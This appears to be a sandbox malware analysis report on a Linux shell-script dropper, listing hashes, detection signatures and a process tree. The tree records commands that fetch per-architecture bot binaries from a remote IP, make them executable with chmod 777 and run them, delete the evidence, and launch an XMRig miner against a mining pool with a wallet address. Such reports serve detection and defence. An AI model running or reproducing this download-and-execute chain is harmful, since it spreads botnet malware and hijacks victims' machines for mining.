Analysis
max time kernel: 95s
max time network: 96s
platform: debian-9_mipsel
resource: debian9-mipsel-20240418-en
resource tags: arch:mipsel, image:debian9-mipsel-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 09-11-2024 04:09
Static task: static1
Behavioral task behavioral1: sample tyo2831qq.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample tyo2831qq.sh, resource debian9-armhf-20240418-en
Behavioral task behavioral3: sample tyo2831qq.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample tyo2831qq.sh, resource debian9-mipsel-20240418-en
General
Target: tyo2831qq.sh
Size: 1KB
MD5: e12d6a1166c4e290ed4ba39f96c780ad
SHA1: 57038253b27c0312102758d25a77b5d1859cba3e
SHA256: 5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199
SHA512: 276aabcf2037ad435a105ded3f3bfb8491fb391d5e1d49942d41774807c3f0b4e15d1ed18a57f0d783cd9aafee3ce1a96e561d3ee6da02b5d6c51fc579bb91ee
Malware Config
Signatures
XMRig Miner payload 2 IoCs
Processes:
resource  yara_rule
/tmp/xmrig  family_xmrig
/tmp/xmrig  xmrig

Xmrig family

Xmrig_linux family

File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid  process
752  chmod
757  chmod
781  chmod
808  chmod
736  chmod
746  chmod
769  chmod
773  chmod
791  chmod
838  chmod
761  chmod
765  chmod

Executes dropped EXE 2 IoCs
Processes:
ioc  pid  process
/tmp/bots  747  bots
/tmp/xmrig  839  xmrig

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
Processes:
description  ioc  process
File opened for reading  /proc/net/route  tyo2831qq.mpsl

Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
description  ioc  process
File opened for reading  /proc/net/route  tyo2831qq.mpsl

System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
pid  process
719  wget
737  tyo2831qq.mips
817  rm

Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description  ioc  process
File opened for modification  /tmp/bots  wget
File opened for modification  /tmp/tyo2831qq.arm6  wget
File opened for modification  /tmp/tyo2831qq.x32  wget
File opened for modification  /tmp/tyo2831qq.i586  wget
File opened for modification  /tmp/tyo2831qq.m68k  wget
File opened for modification  /tmp/tyo2831qq.arm7  wget
File opened for modification  /tmp/tyo2831qq.mips  wget
File opened for modification  /tmp/tyo2831qq.mpsl  wget
File opened for modification  /tmp/tyo2831qq.sh4  wget
File opened for modification  /tmp/tyo2831qq.x86  wget
File opened for modification  /tmp/tyo2831qq.ppc  wget
File opened for modification  /tmp/xmrig  wget
Processes
(child processes are indented under the parent; signature hits are listed beneath each process)

/tmp/tyo2831qq.sh  tyo2831qq.sh  PID:716
  /usr/bin/wget  wget http://31.172.80.237/tyo2831qq.mips  PID:719
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/chmod  chmod 777 tyo2831qq.mips  PID:736
    - File and Directory Permissions Modification
  /tmp/tyo2831qq.mips  ./tyo2831qq.mips  PID:737
    - System Network Configuration Discovery
  /usr/bin/wget  wget http://31.172.80.237/bots  PID:740
    - Writes file to tmp directory
  /bin/chmod  chmod 777 bots  PID:746
    - File and Directory Permissions Modification
  /tmp/bots  ./bots  PID:747
    - Executes dropped EXE
  /usr/bin/wget  wget http://31.172.80.237/tyo2831qq.mpsl  PID:750
    - Writes file to tmp directory
  /bin/chmod  chmod 777 tyo2831qq.mpsl  PID:752
    - File and Directory Permissions Modification
  /tmp/tyo2831qq.mpsl  ./tyo2831qq.mpsl  PID:753
    - Reads system routing table
    - Reads system network configuration
  /usr/bin/wget  wget http://31.172.80.237/tyo2831qq.sh4  PID:756
    - Writes file to tmp directory
  /bin/chmod  chmod 777 tyo2831qq.sh4  PID:757
    - File and Directory Permissions Modification
  /tmp/tyo2831qq.sh4  ./tyo2831qq.sh4  PID:758
  /usr/bin/wget  wget http://31.172.80.237/tyo2831qq.x86  PID:760
    - Writes file to tmp directory
  /bin/chmod  chmod 777 tyo2831qq.x86  PID:761
    - File and Directory Permissions Modification
  /tmp/tyo2831qq.x86  ./tyo2831qq.x86  PID:762
  /usr/bin/wget  wget http://31.172.80.237/tyo2831qq.arm6  PID:764
    - Writes file to tmp directory
  /bin/chmod  chmod 777 tyo2831qq.arm6  PID:765
    - File and Directory Permissions Modification
  /tmp/tyo2831qq.arm6  ./tyo2831qq.arm6  PID:766
  /usr/bin/wget  wget http://31.172.80.237/tyo2831qq.x32  PID:768
    - Writes file to tmp directory
  /bin/chmod  chmod 777 tyo2831qq.x32  PID:769
    - File and Directory Permissions Modification
  /tmp/tyo2831qq.x32  ./tyo2831qq.x32  PID:770
  /usr/bin/wget  wget http://31.172.80.237/tyo2831qq.ppc  PID:772
    - Writes file to tmp directory
  /bin/chmod  chmod 777 tyo2831qq.ppc  PID:773
    - File and Directory Permissions Modification
  /tmp/tyo2831qq.ppc  ./tyo2831qq.ppc  PID:774
  /usr/bin/wget  wget http://31.172.80.237/tyo2831qq.i586  PID:776
    - Writes file to tmp directory
  /bin/chmod  chmod 777 tyo2831qq.i586  PID:781
    - File and Directory Permissions Modification
  /tmp/tyo2831qq.i586  ./tyo2831qq.i586  PID:782
  /usr/bin/wget  wget http://31.172.80.237/tyo2831qq.m68k  PID:785
    - Writes file to tmp directory
  /bin/chmod  chmod 777 tyo2831qq.m68k  PID:791
    - File and Directory Permissions Modification
  /tmp/tyo2831qq.m68k  ./tyo2831qq.m68k  PID:793
  /usr/bin/wget  wget http://31.172.80.237/tyo2831qq.spc  PID:796
  /usr/bin/wget  wget http://31.172.80.237/tyo2831qq.arm4  PID:799
  /usr/bin/wget  wget http://31.172.80.237/tyo2831qq.arm7  PID:803
    - Writes file to tmp directory
  /bin/chmod  chmod 777 tyo2831qq.arm7  PID:808
    - File and Directory Permissions Modification
  /tmp/tyo2831qq.arm7  ./tyo2831qq.arm7  PID:809
  /usr/bin/wget  wget http://31.172.80.237/tyo2831qq.arm5  PID:812
  /bin/rm  rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86  PID:817
    - System Network Configuration Discovery
  /usr/bin/wget  wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig  PID:818
    - Writes file to tmp directory
  /bin/chmod  chmod 777 xmrig  PID:838
    - File and Directory Permissions Modification
  /tmp/xmrig  ./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B  PID:839
    - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Downloads